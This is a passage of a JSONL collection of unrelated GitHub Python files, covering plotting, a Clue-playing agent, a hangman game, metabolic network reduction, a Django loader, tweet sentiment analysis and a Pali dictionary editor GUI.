Method: \"+method)\n \n skeys = sorted(mesMtdData.keys(), key=lambda k: np.median(mesMtdData[k]))\n pos = 1\n for lbl in skeys:\n ax.text(pos-0.5, 0.3+len(lbl)/70, lbl, rotation=90) \n pos+=1\n \n #ax.set_xticklabels(lbls) \n prt=ax.violinplot([mesMtdData[m] for m in skeys],showmeans=True,showmedians = True)\n prt['cmeans'].set_facecolor('black')\n prt['cmeans'].set_edgecolor('black')\n prt['cmeans'].set_linestyle('--')\n prt['cmeans'].set_linewidth(3)\n \n if not os.path.exists(compPath):\n os.makedirs(compPath)\n\n fig.savefig(compPath+'MethodMeasure_'+method+'.svg', format='svg')\n #fig.savefig(picPath+'1'+names[field]+'.jpg', format='jpg', dpi=100)\n #plt.cla()\n #plt.clf()\n fig.clf()\n ax.cla()\n plt.close('all')\n fig = None\n ax = None\n\n\n\n\n #Make it better, not good.\n #for m in measures:\n # for ds in datasets:\n # fig,ax = plt.subplots(ncols = 1,nrows = 1,figsize=(10,3))\n # fig.tight_layout() \n # ax.set_ylim([0, 1])\n # ax.set_xlim([0,len(methods)+1])\n # ax.set_xticks([i+1 for i in range(len(methods))])\n\n # skeys = sorted(methods, key=lambda k: np.median(rd[k][ds]['measures'][m]))\n # pos = 1\n # for lbl in skeys:\n # ax.text(pos-0.5, 0.3+len(lbl)/70, lbl, rotation=90) \n # pos+=1\n \n # #ax.set_xticklabels(lbls) \n # prt=ax.violinplot([rd[sk][ds]['measures'][m] for sk in skeys],showmeans=True,showmedians = True)\n # prt['cmeans'].set_facecolor('black')\n # prt['cmeans'].set_edgecolor('black')\n # prt['cmeans'].set_linestyle('--')\n # prt['cmeans'].set_linewidth(3)\n \n \n # if not os.path.exists(compPath):\n # os.makedirs(compPath)\n # ax.set_title(m+ ' performance for method(s) on '+ds+' dataset')\n # fig.savefig(compPath+'MeasureDS_'+str(measures.index(m))+'-'+str(datasets.index(ds))+'.svg', format='svg')\n # #fig.savefig(picPath+'1'+names[field]+'.jpg', format='jpg', dpi=100)\n # #plt.cla()\n # #plt.clf()\n # fig.clf()\n # ax.cla()\n \n # plt.close('all')\n # fig = None\n # ax = None\n file = open(compPath+'done.confirm','w')\n file.close()\n\n return md5Name","repo_name":"rebvar/datasci.datalytikz.com","sub_path":"MyDS/DA/ExpDA.py","file_name":"ExpDA.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3820921165","text":"import random\n\nfrom strategies import RandomPlayer\n\n# Probability for cheating in first round 1/1000, in second round 2/1000, ...\nCHEATING_PROB = 1000.0\n\n\nclass CheatingRandomPlayer(RandomPlayer):\n \"\"\"\n Like random player but manages with a certain growing probability to look into the crime cards\n and use that information for accusation then\n \"\"\"\n\n def __init__(self, figure):\n super().__init__(figure)\n self.round_counter = 0\n self.STRATEGY = \"CHEATING_RANDOM\"\n\n def next_question(self):\n self.round_counter += 1\n\n # Randomly decide to cheat (with increasing probability during the game)\n if random.random() < self.round_counter / CHEATING_PROB:\n # Cheat (use the crime information from game object for accusation)\n self.current_question = (\n True,\n self.game.crime_figure,\n self.game.crime_weapon,\n self.game.crime_scene\n )\n return self.current_question\n else:\n # Do not cheat but use random player strategy\n return super().next_question()\n","repo_name":"bhaettasch/computer-plays-clue","sub_path":"strategies/cheating_random_player.py","file_name":"cheating_random_player.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6211766336","text":"from pyjamas.ui.HorizontalPanel import HorizontalPanel\nfrom pyjamas.ui.Composite import Composite\nfrom pyjamas.Canvas.GWTCanvas import GWTCanvas\nfrom game import Game\n\nclass Widget(Composite):\n def __init__(self, SW, SH):\n self.canvas = Canvas(SW, SH)\n\n def draw(self, game):\n self.canvas.draw(game)\n\nclass Canvas(HorizontalPanel):\n def __init__(self, SW, SH):\n HorizontalPanel.__init__(self)\n self.SW = SW\n self.SH = SH\n self.context = GWTCanvas(SW, SH, SW, SH)\n self.context.addStyleName(\"gwt-canvas\")\n self.add(self.context)\n\n def draw(self, game):\n self.context.fillStyle = \"#00AA00\"\n self.context.fillRect(0, 0, SW, SH)\n","repo_name":"roytu/OthelloBot","sub_path":"widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22658313446","text":"import os\nimport sys\n\nFS=44100\nOCT_CMD = 'octave --silent --eval \"splitAudioFile(\\'INFILE\\',\\'OUTDIR\\',FS,FROMS, TOS, INDEX); exit;\"'\n\ndef chop(inwav, intxt, outdir):\n ctr = 0\n for line in open(intxt):\n parts = line.split()\n fromS = (parts[0])\n toS = (parts[1])\n cmd = OCT_CMD.replace('INFILE',inwav).replace('OUTDIR',outdir).replace('FS',str(FS)).replace('FROMS',fromS).replace('TOS',toS).replace('INDEX',str(ctr))\n os.system(cmd)\n \n \nif __name__==\"__main__\":\n chop(sys.argv[1],sys.argv[2],sys.argv[3])","repo_name":"annakaa/Bot-hemianRhapsody","sub_path":"tools/chop.py","file_name":"chop.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15466800033","text":"from machine import Pin\r\nfrom time import sleep\r\nimport tm1637\r\nfrom utime import sleep\r\n\r\ntm = tm1637.TM1637(clk=Pin(4), dio=Pin(5))\r\nRoA_Pin = 0 # CLK\r\nRoB_Pin = 1 # DT\r\nBtn_Pin = 2 # SW\r\n\r\nglobalCounter = 0 # counter value\r\n\r\nflag = 0 # Whether the rotation flag occurs\r\nLast_RoB_Status = 0 # DT state\r\nCurrent_RoB_Status = 0 # CLK state\r\n\r\n\r\ndef setup():\r\n global clk_RoA\r\n global dt_RoB\r\n global sw_BtN\r\n \r\n clk_RoA = Pin(RoA_Pin,Pin.IN) \r\n dt_RoB = Pin(RoB_Pin,Pin.IN) \r\n sw_BtN = Pin(Btn_Pin,Pin.IN, Pin.PULL_UP) \r\n # # Initialize the interrupt function, when the SW pin is 0, the interrupt is enabled\r\n sw_BtN.irq(trigger=Pin.IRQ_FALLING,handler=btnISR)\r\n\r\n# Rotation code direction bit judgment function\r\ndef rotaryDeal():\r\n global flag \r\n global Last_RoB_Status\r\n global Current_RoB_Status\r\n global globalCounter \r\n\r\n Last_RoB_Status = dt_RoB.value() \r\n # Judging the level change of the CLK pin to distinguish the direction\r\n while(not clk_RoA.value()): \r\n Current_RoB_Status = dt_RoB.value() \r\n flag = 1 # Rotation mark occurs\r\n if flag == 1: # The flag bit is 1 and a rotation has occurred\r\n flag = 0 # Reset flag bit\r\n if (Last_RoB_Status == 0) and (Current_RoB_Status == 1):\r\n globalCounter = globalCounter + 1 # counterclockwise, positive\r\n if (Last_RoB_Status == 1) and (Current_RoB_Status == 0):\r\n globalCounter = globalCounter - 1 # Clockwise, negative\r\n\r\n# Interrupt function, when the SW pin is 0, the interrupt is enabled\r\ndef btnISR(chn):\r\n global globalCounter\r\n globalCounter = 0 \r\n print ('globalCounter = %d' % globalCounter)\r\n while True:\r\n # Define a counter that changes every 1 second\r\n tm.number(globalCounter)\r\n globalCounter = globalCounter - 1\r\n sleep(1)\r\n if globalCounter == 0:\r\n break\r\n\r\ndef loop():\r\n global globalCounter \r\n tmp = 0 \r\n while True:\r\n rotaryDeal() \r\n if tmp != globalCounter: \r\n print ('globalCounter = %d' % globalCounter) \r\n tmp = globalCounter \r\n tm.number(globalCounter)\r\n \r\n\r\nif __name__ == '__main__': \r\n setup() \r\n loop() \r\n\r\n","repo_name":"Luciano2018/PicoBooks","sub_path":"Lesson 21ú¦Electronic Hourglass/21. Electronic Hourglass.py","file_name":"21. Electronic Hourglass.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19092067376","text":"from django.db import IntegrityError\nfrom django.db.models import ProtectedError\nfrom stamdata3.StamdataExceptions import InvalidRelation\nfrom .load_data import LoadData\nfrom ..models import Resource, Employment, Function, CostCenter, WorkPlace, Organisation\nfrom stamdata3.Resource import Resource as Resource_stamdata\n\n\nclass LoadResources(LoadData):\n def load(self, include_inactive=True):\n orphans = Resource.objects.filter(company__companyCode=self.company_code)\n resources = self.stamdata.resources()\n for resource in resources:\n if resource.company_code != self.company_code:\n raise ValueError('Company code %s in file, %s requested' % (resource.company_code, self.company_code))\n resource_obj, created = Resource.objects.get_or_create(\n company=self.company,\n resourceId=resource.resource_id)\n\n resource_obj.firstName = resource.first_name\n resource_obj.lastName = resource.last_name\n resource_obj.socialSecurityNumber = resource.ssn\n resource_obj.status = resource.status\n\n resource_obj.save()\n orphans = orphans.exclude(id=resource_obj.id)\n\n self.load_employments(resource, resource_obj, include_inactive)\n for orphan in orphans:\n try:\n orphan.delete()\n except ProtectedError:\n print('Protected relations: %s' % orphan)\n except IntegrityError as e:\n print('Error deleting %s: %s' % (orphan, e))\n\n def load_employments(self, resource: Resource_stamdata, resource_obj: Resource, include_inactive=True):\n \"\"\"\n :param include_inactive: Include inactive resources\n :param resource: stamdata3 resource object\n :param resource_obj: django resource object\n \"\"\"\n\n orphans = resource_obj.employments.all()\n for employment in resource.employments:\n try:\n emp = Employment.objects.get(resource=resource_obj, sequenceRef=employment.sequence_ref)\n except Employment.DoesNotExist:\n emp = Employment(resource=resource_obj, sequenceRef=employment.sequence_ref)\n\n emp.employmentType = employment.type\n emp.employmentTypeDescription = employment.type_description\n emp.mainPosition = employment.main_position\n emp.percentage = employment.percentage\n emp.postId = employment.post_id\n emp.postIdDescription = employment.post_id_description\n emp.postCode = employment.post_code\n emp.postCodeDescription = employment.post_code_description\n\n try:\n function = employment.relation('FUNCTION')\n try:\n emp.function = Function.objects.get(value=function.value, company=None)\n except Function.DoesNotExist:\n print('Function %s does not exist (resource %s in company %s)' % (function.value, resource.resource_id, resource.company_code))\n except InvalidRelation as e:\n print(e)\n\n try:\n emp.costCenter = self.load_cost_center(employment)\n except InvalidRelation as e:\n print(e)\n\n try:\n emp.workPlace = self.load_work_place(employment)\n except InvalidRelation:\n pass\n\n try:\n emp.organisation = self.load_organisation(employment)\n except InvalidRelation as e:\n print(e)\n\n emp.dateFrom = employment.date_from\n emp.dateTo = employment.date_to\n if not include_inactive and not emp.active():\n continue\n\n emp.save()\n if emp.mainPosition:\n resource_obj.mainPosition = emp\n resource_obj.save()\n\n orphans = orphans.exclude(id=emp.id)\n\n orphans.delete()\n\n def load_cost_center(self, employment):\n relation = employment.relation('COST_CENTER')\n cost_center, created = CostCenter.objects.get_or_create(\n company=self.company,\n value=relation.value,\n defaults={'description': relation.description})\n return cost_center\n\n def load_work_place(self, employment):\n relation = employment.relation('WORK_PLACE')\n workplace, created = WorkPlace.objects.get_or_create(\n company=self.company,\n value=relation.value,\n defaults={'description': relation.description})\n return workplace\n\n def load_organisation(self, employment):\n relation = employment.relation('ORGANIZATIONAL_UNIT')\n try:\n return Organisation.objects.get(\n company=self.company,\n orgId=relation.value)\n\n except Organisation.DoesNotExist:\n print('Organisation %s does not exist' % relation.value)\n","repo_name":"StorFollo-IKT/django-stamdata3","sub_path":"employee_info/load_data/load_resources.py","file_name":"load_resources.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30869040796","text":"import random\nimport art\nimport words\nwords.parse_words()\nword_list = words.get_words()\n\nrandom_choice = random.choice(word_list)\n\n# тест\n# print(random_choice)\n\nblanks = []\nfor blank in range(len(random_choice)):\n blanks.append(\"_\")\n\nprint(''.join(blanks))\nprint('Привет. Я загадал для тебя слово. Попробуй отгадать')\nused_letters = []\nlives = 6\nwhile \"_\" in blanks:\n user_choice = input('Буква: ').lower()\n if user_choice in used_letters:\n print(\"Ты уже загадывал эту букву\")\n elif user_choice not in random_choice:\n used_letters.append(user_choice)\n print(f\"Использованные буквы: {', '.join(used_letters)}\")\n lives -= 1\n print(\"Нет такой буквы\")\n else:\n used_letters.append(user_choice)\n print(f\"Использованные буквы: {', '.join(used_letters)}\")\n for position in range(len(random_choice)):\n if user_choice == random_choice[position]:\n blanks[position] = user_choice\n print(\"\".join(blanks))\n print(art.stages[lives])\n if \"_\" not in blanks:\n print(\"Ура! Ты победил!\")\n break\n if lives == 0:\n print('Ты проиграл :(')\n print(f\"Я загадал слово {random_choice}\")\n break\n\n\n\n\n\n","repo_name":"ansmtz/hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"36757060658","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport helpers\n#import nltk\n\nfrom analyzer import Analyzer\nfrom termcolor import colored\n\ndef main():\n\n # ensure proper usage\n if len(sys.argv) != 2:\n sys.exit(\"Usage: ./tweets @username\")\n \n # create screen_name variable using 2nd argument \n screen_name = sys.argv[1]\n \n # call get_user_timeline function \n tweets = helpers.get_user_timeline(screen_name, 50)\n \n # if query to Twitter failed, exit the \n if tweets is None:\n sys.exit(\"No query results returned\")\n \n # absolute paths to lists\n positives = os.path.join(sys.path[0], \"positive-words.txt\")\n negatives = os.path.join(sys.path[0], \"negative-words.txt\")\n \n # instantiate the analyzer\n analyzer = Analyzer(positives, negatives)\n \n # iterate through list of tweets\n for tweet in tweets:\n # pass each tweet through the analyzer and get the score\n score = analyzer.analyze(tweet)\n # print appropriate result \n if score > 0.0:\n print(colored(\"{} {}\".format(score, tweet), \"green\"))\n elif score < 0.0:\n print(colored(\"{} {}\".format(score, tweet), \"red\"))\n else:\n print(colored(\"{} {}\".format(score, tweet), \"yellow\"))\n \n \nif __name__ == \"__main__\":\n main()\n \n","repo_name":"jmak24/CS50-2017","sub_path":"pset6/sentiments/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7696224091","text":"\"\"\" Implementation of the conjunctive reduction method proposed in:\n\nMachado, D, et al. (2010) \"Model transformation of metabolic networks using a Petri net based framework.\"\nInternational Workshop on Biological Processes & Petri Nets (BioPPN).\n\"\"\"\nfrom __future__ import division\n\nfrom builtins import str\n\nfrom framed.model.model import Reaction\nfrom framed.model.cbmodel import CBModel\nfrom uuid import uuid4\nimport warnings\n\n\ndef balanced_model_reduction(model, metabolites, fluxes, must_keep=None, max_degree=None, clean_null_fluxes=True,\n clean_disconnected=True, abstol=1e-9):\n if clean_null_fluxes:\n model.remove_reactions([r_id for r_id, val in fluxes.items() if abs(val) < abstol])\n\n if max_degree:\n m_r_table = model.metabolite_reaction_lookup()\n metabolites = [m_id for m_id in metabolites if len(m_r_table[m_id]) <= max_degree]\n\n for m_id in metabolites:\n remove_balanced_metabolite(model, m_id, fluxes, must_keep, abstol)\n\n if clean_disconnected:\n model.remove_metabolites(_disconnected_metabolites(model), safe_delete=False)\n\n\ndef remove_balanced_metabolite(model, m_id, fluxes, must_keep=None, abstol=1e-9):\n neighbours = _metabolite_neighbours(model, [m_id])\n\n balance = sum([model.stoichiometry[(m_id, r_id)] * fluxes[r_id] for r_id in neighbours])\n turnover = sum([abs(model.stoichiometry[(m_id, r_id)] * fluxes[r_id]) for r_id in neighbours]) / 2.0\n\n # print 'removing {}\\t balance {}\\t turnover {}'.format(m_id, balance, turnover)\n\n assert abs(balance) < abstol\n\n if abs(turnover) > abstol:\n\n new_neighbours = _reaction_neighbours(model, neighbours)\n new_coeffs = dict()\n\n for m_id2 in new_neighbours:\n coeff = sum([model.stoichiometry[(m_id2, r_id)] * fluxes[r_id] for r_id in neighbours if\n (m_id2, r_id) in model.stoichiometry]) / turnover\n flow = sum([abs(model.stoichiometry[(m_id2, r_id)]) * fluxes[r_id] for r_id in neighbours if\n (m_id2, r_id) in model.stoichiometry]) / 2\n if abs(coeff) > abstol:\n new_coeffs[m_id2] = coeff\n else:\n if must_keep and m_id2 in must_keep and flow > abstol:\n # print 'removing {} violated {} turnover {} coeff {} flow {}'.format(m_id, m_id2, turnover, coeff, flow)\n return\n\n if new_coeffs:\n new_id = 'R_' + str(uuid4())[:8]\n reversible = all([model.reactions[r_id].reversible for r_id in neighbours])\n model.add_reaction(Reaction(new_id, new_id, reversible))\n\n if not reversible and isinstance(model, CBModel):\n model.set_lower_bound(new_id, 0)\n\n for m_id2, coeff in new_coeffs.items():\n model.stoichiometry[(m_id2, new_id)] = coeff\n\n fluxes[new_id] = turnover\n\n model.remove_reactions(neighbours)\n else:\n model.remove_reactions([r_id for r_id in neighbours if abs(fluxes[r_id]) < abstol])\n\n model.remove_metabolite(m_id)\n\n\ndef _metabolite_neighbours(model, metabolites):\n return _get_neighbours(model, metabolites, 'metabolites')\n\n\ndef _reaction_neighbours(model, reactions):\n return _get_neighbours(model, reactions, 'reactions')\n\n\ndef _get_neighbours(model, elements, kind):\n if kind == 'metabolites':\n table = model.metabolite_reaction_lookup()\n elif kind == 'reactions':\n table = model.reaction_metabolite_lookup_table()\n neighbours = []\n for elem in elements:\n for neighbour in table[elem].keys():\n if neighbour not in neighbours:\n neighbours.append(neighbour)\n return neighbours\n\n\ndef _verify_balance(model, metabolites, fluxes, abstol=1e-9):\n m_r_table = model.metabolite_reaction_lookup()\n\n success = True\n\n for m_id in metabolites:\n neighbours = m_r_table[m_id]\n balance = sum([coeff * fluxes[r_id] for r_id, coeff in neighbours.items()])\n if abs(balance) > abstol:\n success = False\n warnings.warn('{} balance {}'.format(m_id, balance), UserWarning)\n return success\n\n\ndef _disconnected_metabolites(model):\n m_r_table = model.metabolite_reaction_lookup()\n return [m_id for m_id, edges in m_r_table.items() if not edges]\n\n\ndef _disconnected_reactions(model):\n return [r_id for r_id, rxn in model.reactions.items() if len(rxn.stoichiometry) == 0]\n","repo_name":"cdanielmachado/framed","sub_path":"src/framed/experimental/reduction.py","file_name":"reduction.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"83"} +{"seq_id":"2820095898","text":"def middle(n):\n global result\n if n:\n middle(ch1[n])\n result += arr[n]\n middle(ch2[n])\n\n\nfor test_case in range(1,11):\n N = int(input())\n arr = [''] * (N+1)\n result = ''\n root_idx = 1\n ch1 = [0] * (N+1)\n ch2 = [0] * (N+1)\n par = [0] * (N+1)\n for _ in range(N):\n word = input().split()\n p = int(word[0])\n arr[p] = word[1]\n if len(word) > 2:\n c1 = int(word[2])\n ch1[p] = c1\n par[c1] = p\n if len(word) > 3:\n c2 = int(word[3])\n ch2[p] = c2\n par[c2] = p\n middle(root_idx)\n print(f'#{test_case} {result}')","repo_name":"kimjinho-dev/baekjoon","sub_path":"SWEA/D4/1231. [S/W 문제해결 기본] 9일차 - 중위순회/[S/W 문제해결 기본] 9일차 - 중위순회.py","file_name":"[S/W 문제해결 기본] 9일차 - 중위순회.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21785566993","text":"\"\"\"Render tab to edit PaliWord table in the database.\"\"\"\n\nfrom completion_combo import CompletionCombo\nfrom functions_db import get_verb_values\nfrom functions_db import get_case_values\nfrom functions_db import get_root_key_values\nfrom functions_db import get_family_word_values\nfrom functions_db import get_family_set_values\nfrom functions_db import get_compound_type_values\nfrom functions_db import get_patterns\nfrom tools.pos import POS\n\nVERB_VALUES = get_verb_values()\nTRANS_VALUES = [\"\", \"trans\", \"intrans\", \"ditrans\"]\nNEG_VALUES = [\"\", \"neg\", \"neg x2\"]\nCASE_VALUES = get_case_values()\nROOT_VALUES = get_root_key_values()\nFAMILY_WORD_VALUES = get_family_word_values()\nFAMILY_SET_VALUES = get_family_set_values()\nDERIVATIVE_VALUES = [\"\", \"kicca\", \"kita\", \"taddhita\"]\nCOMPOUND_TYPE_VALUES = get_compound_type_values()\nPATTERN_VALUES = get_patterns()\n\n\ndef make_tab_edit_dpd(sg, primary_user):\n\n origin = \"pass1\" if primary_user else \"dps\"\n\n add_word_layout = [\n [\n sg.Text(\"show fields\", size=(15, 1)),\n sg.Radio(\n \"all\", \"group1\",\n key=\"show_fields_all\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Radio(\n \"root\", \"group1\",\n key=\"show_fields_root\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Radio(\n \"compound\", \"group1\",\n key=\"show_fields_compound\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Radio(\n \"word\", \"group1\",\n key=\"show_fields_word\",\n enable_events=True,\n tooltip=\"Show the fields relevant to the type of word\"),\n sg.Text(\n \"\", key=\"show_fields_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"id\", size=(15, 1, )),\n sg.Input(\n \"\", key=\"id\", size=(20, 1),\n background_color=\"black\",\n tooltip=\"A unique id.\\n\"),\n\n sg.Text(\"user_id\"),\n sg.Input(\n \"\", key=\"user_id\", size=(21, 1),\n background_color=\"black\",\n tooltip=\"A unique user id.\"),\n sg.Text(\n \"\", key=\"id_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"pali_1\", size=(15, 1)),\n sg.Input(\n key=\"pali_1\", size=(50, 1),\n tooltip=\"Vocative singular of nouns and partitiplces,\\n\\\n3rd person singular of verbs, unless irrgular.\"),\n sg.Text(\n \"\", key=\"pali_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"pali_2*\", size=(15, 1)),\n sg.Input(\n key=\"pali_2\", size=(50, 1), enable_events=True,\n tooltip=\"Nominative singular of masc and neuter nouns.\"),\n sg.Text(\n \"\", key=\"pali_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"pos\", size=(15, 1)),\n CompletionCombo(\n POS, key=\"pos\", size=(7, 1), enable_events=True,\n text_color=None, background_color=None,\n tooltip=\"Part of speech. Only use values in the dropdown list.\"\n ),\n sg.Text(\n \"\", key=\"pos_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"grammar*\", size=(15, 1)),\n sg.Input(\n key=\"grammar\", size=(50, 1), enable_events=True,\n tooltip=\"Order:\\npos\\n, or of\\n\"),\n sg.Text(\n \"\", key=\"grammar_error\", size=(50, 1), text_color=\"red\")\n ],\n\n [\n sg.Text(\"derived_from*\", size=(15, 1)),\n sg.Input(\n key=\"derived_from\", size=(50, 1),\n enable_events=True,\n tooltip=\"Kitas are derived from the present tense verb.\\n\\\nTaddhitas - remove prefix and suffixes.\"),\n sg.Text(\n \"\", key=\"derived_from_error\", size=(50, 1), text_color=\"red\")\n\n ],\n [\n sg.Text(\"neg\", size=(15, 1)),\n CompletionCombo(\n NEG_VALUES, key=\"neg\", size=(7, 1),\n tooltip=\"Negatives. Mostly prefixed with na, nir or vi.\"),\n sg.Text(\"\", key=\"neg_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"verb\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n VERB_VALUES, key=\"verb\", size=(13, 1),\n tooltip=\"Type of verb. Synchronize with base and grammar.\")),\n sg.Text(\"\", key=\"verb_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"trans\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n TRANS_VALUES, key=\"trans\", size=(7, 1),\n tooltip=\"Transitivity of verbs and active participles.\\n\\\nLeave blank for other parts of speech.\")),\n sg.Text(\n \"\", key=\"trans_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"case\", size=(15, 1)),\n CompletionCombo(\n CASE_VALUES, key=\"plus_case\", size=(20, 1),\n tooltip=\"What case does a related syntactically related word take?\"),\n sg.Text(\n \"\", key=\"case_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"meaning_1\", size=(15, 2)),\n sg.Multiline(\n key=\"meaning_1\", size=(50, 2), no_scrollbar=True,\n enable_events=True,\n tooltip=\"Primary meanings, seperated by ';'\"),\n sg.Text(\n \"\", key=\"meaning_1_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"add_spelling\", size=(15, 1)),\n sg.Input(\n key=\"add_spelling\", size=(25, 1), enable_events=True,\n tooltip=\"Add a word to the user dictionary.\"),\n sg.Button(\"Add\", key=\"add_spelling_button\", font=(None, 13)),\n sg.Button(\"Edit\", key=\"edit_spelling_button\", font=(None, 13)),\n sg.Button(\"Check\", key=\"check_spelling_button\", font=(None, 13)),\n sg.Text(\n \"\", key=\"add_spelling_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"meaning_lit\", size=(15, 1)),\n sg.Input(\n key=\"meaning_lit\", size=(50, 1),\n enable_events=True,\n tooltip=\"Literal meaning of the prefix and suffix.\\n\\\nLeave empty for long compounds.\"),\n sg.Text(\n \"\", key=\"meaning_lit_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"meaning_2\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"meaning_2\", size=(50, 1),\n enable_events=True,\n tooltip=\"Meaning from Buddhadatta or CPED or DPS.\"),\n ),\n sg.Text(\n \"\", key=\"meaning_2_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"suggestion\", visible=not primary_user, size=(15, 1)),\n sg.Button(\"GPT\", visible=not primary_user, key=\"online_suggestion_button\"),\n sg.Multiline(\n key=\"online_suggestion\",\n visible=not primary_user,\n size=(45, 2),\n enable_events=True,\n ),\n sg.Text(\n \"\", key=\"online_suggestion_error\", size=(50, 1), text_color=\"red\", visible=not primary_user)\n ],\n [\n sg.Text(\"root_key\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n ROOT_VALUES, key=\"root_key\",\n size=(10, 1),\n auto_size_text=False,\n tooltip=\"Root key in PaliRoots table.\\n\\\nSelect a value from the dropdown list.\")),\n sg.Text(\n \"\", key=\"root_info\", text_color=\"white\",\n pad=(10, 0)),\n sg.Text(\n \"\", key=\"root_key_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family_root*\", size=(15, 1)),\n sg.pin(\n sg.Combo(\n values=[], key=\"family_root\",\n size=(40, 1),\n enable_events=True,\n enable_per_char_events=True,\n auto_size_text=False,\n tooltip=\"Prefix(es) and root seperated by a space.\")),\n sg.pin(\n sg.Button(\n \"Get\",\n size=(5, 1),\n font=(None, 13),\n key=\"get_family_root\")),\n sg.Text(\n \"\", key=\"family_root_error\", size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"root_sign*\", size=(15, 1)),\n sg.pin(\n sg.Combo(\n values=[],\n key=\"root_sign\",\n size=(40, 1),\n enable_events=True,\n enable_per_char_events=True,\n auto_size_text=False,\n tooltip=\"Sign of the verb.\\n\\\nInlclude '*' for causatives and group 8 verbs.\")),\n sg.pin(\n sg.Button(\n \"Get\",\n size=(5, 1),\n font=(None, 13),\n key=\"get_root_sign\")),\n sg.Text(\n \"\", key=\"root_sign_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"root_base\", size=(15, 1)),\n sg.pin(\n sg.Combo(\n values=[],\n key=\"root_base\",\n size=(40, 1),\n enable_per_char_events=True,\n auto_size_text=False,\n tooltip=\"Root + sign = Base. (caus, pass, etc.)\\n\\\nIf irregular, show phonetic development, e.g.\\n\\\nkar + *āpe > kārāpe > karāpe (caus, irreg).\")),\n sg.pin(\n sg.Button(\n \"Get\",\n size=(5, 1),\n font=(None, 13),\n key=\"get_root_base\")),\n sg.Text(\n \"\", key=\"root_base_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family_word\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n FAMILY_WORD_VALUES,\n key=\"family_word\",\n size=(49, 1),\n tooltip=\"Family of the word if not derived from a root.\"),\n ),\n sg.Text(\n \"\", key=\"family_word_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"family_compound*\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"family_compound\", size=(50, 1),\n enable_events=True,\n tooltip=\"Family compounds, seperated by space.\")),\n sg.Text(\n \"\", key=\"family_compound_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"construction*\", size=(15, 2)),\n sg.Multiline(\n key=\"construction\",\n no_scrollbar=True,\n size=(50, 2),\n enable_events=True,\n tooltip=\"Construciton of the word, showing all phonetic change.\"),\n sg.Text(\n \"\", key=\"construction_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"add_construction\", size=(20, 1),\n tooltip=\"Add this word to the words to add list.\")),\n sg.pin(\n sg.Button(\n \"Add\", key=\"add_construction_button\", font=(None, 13))),\n sg.Text(\n \"\", key=\"add_construction_error\", size=(50, 1),\n text_color=\"red\")\n ],\n [\n sg.Text(\"derivative\", size=(15, 1)),\n sg.pin(\n CompletionCombo(\n values=DERIVATIVE_VALUES, key=\"derivative\", size=(10, 1),\n enable_per_char_events=True,\n tooltip=\"Choose a value from the dropdown\")),\n sg.Text(\n \"\", key=\"derivative_error\",\n size=(50, 1), text_color=\"red\")\n ],\n [\n sg.Text(\"suffix*\", size=(15, 1)),\n sg.pin(\n sg.Input(\n key=\"suffix\",\n enable_events=True,\n size=(31, 1),\n tooltip=\"Final suffix used. Don't add for words with case endings\")),\n sg.Text(\n \"\", key=\"suffix_error\",\n size=(50, 1), 